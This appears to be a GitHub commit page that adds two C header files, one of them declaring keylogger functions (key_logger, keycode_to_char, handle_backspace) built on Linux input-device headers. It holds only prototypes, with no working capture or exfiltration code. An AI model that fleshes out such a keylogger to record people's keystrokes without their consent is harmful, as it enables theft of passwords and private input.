We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent c250b23 commit e952b49Copy full SHA for e952b49
src/linux/LinuxApp.h
@@ -0,0 +1,3 @@
1
+#pragma once
2
+
3
+int RunLinuxApp ( );
src/linux/LinuxKeyLogger.h
@@ -0,0 +1,9 @@
+#include <linux/input.h>
+#include <fcntl.h>
+#include <unistd.h>
4
+#include <stdio.h>
5
+#include <stdlib.h>
6
7
+char keycode_to_char (int code, int shift);
8
+void handle_backspace (FILE *log);
9
+int key_logger ( );
0 commit comments